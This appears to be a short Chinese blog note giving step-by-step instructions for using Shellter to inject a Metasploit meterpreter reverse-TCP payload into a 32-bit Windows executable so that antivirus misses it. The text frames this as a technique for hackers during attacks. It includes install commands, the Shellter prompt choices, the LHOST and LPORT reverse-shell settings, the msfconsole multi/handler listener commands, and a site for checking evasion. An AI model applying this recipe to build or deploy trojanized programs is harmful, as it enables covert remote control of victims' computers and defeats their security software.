Shellter方式规避杀软

• 2019 年 10 月 6 日
• 筆記

在黑客进行攻击的的过程中通常都需要规避安全防护设备，例如：入侵检测(IDS)或者杀毒软件(AV)。当在使用一些他人或者其它工具生成的exploit或者payload，例如：metasploit或者exploit-DB，在进行入侵的过程中很有可能被一些安全防护设备所发现。此时如果能够更改自己的malware、payload、或者shellcode，这样就能够绕过杀毒软件(AV)和其它安全防护设备。在篇文章中，我们将会使用shellter的方式绕过杀软(AV)，与其他方式(Veil-Evasion等)相比，它在重新编码payloads通过AV软件方面效果更加显著。

1、Shellter工作方式简介

shellter能够重新编码本机32位独立的Windows应用程序。能够采用任何32位的Windows应用程序，并嵌入shellcode，还是Metasploit等应用程序提供的payload，利用这种方式通常都能够绕过杀软(AV)的检测。因此我们可以使用32位应用程序创建无限多个签名，从而绕过杀软(AV)的防护检测。

2、下载&安装

Kali Linux系统下安装: apt-get update apt-get install shelter Windows系统下： https://www.shellterproject.com/Downloads/Shellter/Latest/shellter.zip

3、详细操作过程如下

（1）启动shellter

将下载后的压缩包进行减压并双击shellter.exe可执行文件，如图所示，将提前准备好的32位windows应用程序放置到shellter.exe同一目录，分别执行如下指令： A: 表示自动操作 N: 表示不进行在线更新 PE Target：可执行文件的绝对路径

（2）设定payload

在执行的过程中提示： A、是否使用隐身模式： Y B、列举payload？：L C、设定所选payload对应标号：1

（3）设定反弹ip地址和端口号

SET LHOST: 192.168.43.167  SET LPORT: 4444

（4）完成

等待结束后，回车可以退出当前界面，此时我们已经将payload嵌入到了nodepad.exe中

（5）metasploit处进行监听：

此处具体过程省略(相信大家都会)

msf5 > use exploit/multi/handler  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  msf5 exploit(multi/handler) > set LHOST 192.168.43.167  msf5 exploit(multi/handler) > set LPORT 4444  msf5 exploit(multi/handler) > exploit -j

（6）查看免杀情况：

http://www.virscan.org/